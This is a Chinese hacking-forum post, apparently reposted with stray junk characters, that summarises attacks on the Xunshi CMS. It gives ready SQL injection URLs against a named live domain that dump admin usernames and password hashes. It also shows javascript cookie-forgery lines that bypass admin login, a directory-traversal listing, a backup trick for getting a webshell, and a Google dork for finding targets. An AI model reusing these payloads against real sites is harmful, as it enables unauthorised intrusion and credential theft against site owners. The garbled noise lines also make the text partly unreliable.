讯时漏洞总结

admin

by:血封忆尘
/ A/ B$ `8 @2 b$ v3 q" c, a
在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了（随着版本的更新）

以下本文总结来自黑防去年第9期杂志上的内容...

) T, i% z  O- a7 N先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%
! W' [# @7 T$ b! R7 U
26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
/ Q2 o" _0 @  P$ o  `& p7 e8 l0 h5 d
记得千万别多了空格，我测试站的时候就发现多了空格注入不出结果的情况
这里一个注入
4 @' G6 W% m6 M" Q0 ?
* _+ \3 t; m. U8 N效果如图:
- C2 A' \. F' s


7 }* ]; n" \1 D( J- K* w9 D: C这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.

密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去

1 y5 s. j3 h( d$ bjavascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));

那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:

因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞

+ v/ l7 }, i1 t$ {3 v5 q4 v它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以
0 |8 q7 D0 e7 B) X; X* r
7 Z; @$ `. Y. [+ m访问这页面来列目录..步骤如下:

1 l+ E: o7 i2 B' Rjavascript:alert(document.cookie="admindj=1")

6 R) E  j; M- O' w: Qhttp://www.political-security.co ... asp?id=46&dir=../..
6 w1 ]) h# |; E, `
效果如图:
; N5 }, e( J" J2 n5 A1 w: a. Y
% v9 A0 M+ Y% i4 |, ~9 p

+ }, j9 j  m+ b这样全站目录都能瞧了..找到后台目录..进去..

那么进了后台怎么拿shell？？上传--备份就ok了..
6 m- Y# A* r4 B* l# }
/ }3 ~8 K, O9 k2 ]. P那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..

这个我也碰到过一次..你都可以通过列目录来实现..

javascript:alert(document.cookie="admindj=1")
9 U9 J4 U0 v5 B3 C3 _0 _- e+ `
http://www.political-security.co ... p?action=BackupData

备份ok..
1 Q0 ]) @0 q5 P5 n. p" w/ P
# L4 o, {& p; Z. k& h* ?6 P那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?

1 c# Q8 y4 H, i, u在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下

" [* f1 Q5 @' r2 k, s  w& J: j0 [' \然后访问此页面进行注入..步骤如下:
+ P8 F  \8 u8 j' d; P
- |4 R  @0 q2 P/ V' `, yjavascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")

然后请求admin/admin_chk.asp页面
) f. d" {2 ]5 n
输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%

26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin

6 K/ x" X/ A  D7 f0 M" @效果如图所示:
7 f7 B0 Z" _0 q

( S: v/ H% p0 D4 P3 `8 Z0 W
讯时漏洞2
google关键字：inurl:news_more.asp?lm2= （关键字很多的自己定义吧）
* D# B4 Z& _2 m6 z4 U
: k2 b" c7 a1 E4 T8 ?2 M- t7 ^' r1、/admin/admin_news_pl_view.asp?id=1
//id任意 填入以下语句
" T( |; b8 D7 e
2、有时1显示错误信息的时候继续往后退2，3，4，我退到11才找到了页面，郁闷！



3 d9 t5 r% L: W% }* f3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='

) C: C8 v& q+ ~$ Y
! H  B+ M6 H5 D* z
. A# Z! _2 ?1 w3 Y爆出管理员帐号和密码了



6 F! w' V7 \2 |: v# H4、cookies进后台

2 L6 T1 X: F) G) Wjavascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));
. F4 \3 H# @: J+ ^0 d! S

+ @* e6 a" ^  k8 p" s
5、后台用了cookie验证，直接访问http://www.political-security.com/admin/admin_index.asp就OK了！
; G  @% |" t, b7 g  ]6 o; {

: {* a$ T/ s$ [  l1 ]1 b
6、后台有上传和备份取SHELL不难。

7、讯时还有个列目录漏洞：http://www.political-security.co ... asp?id=46&dir=../..
! v& k! r) j+ W+ \
逍遥复仇：我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL，有的说虽然后台显示但备份页面是存在的，登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData，我这个没有，郁闷着呢，谁还有其他办法提供一下，谢谢！
3 `9 \3 }. ^1 D1 G* W
1 e6 h/ l- l; L' h6 U# N" j
( P1 H7 I) u" B9 @, p7 q
  c( X4 G# m' e8 a8 d0 F0 `. a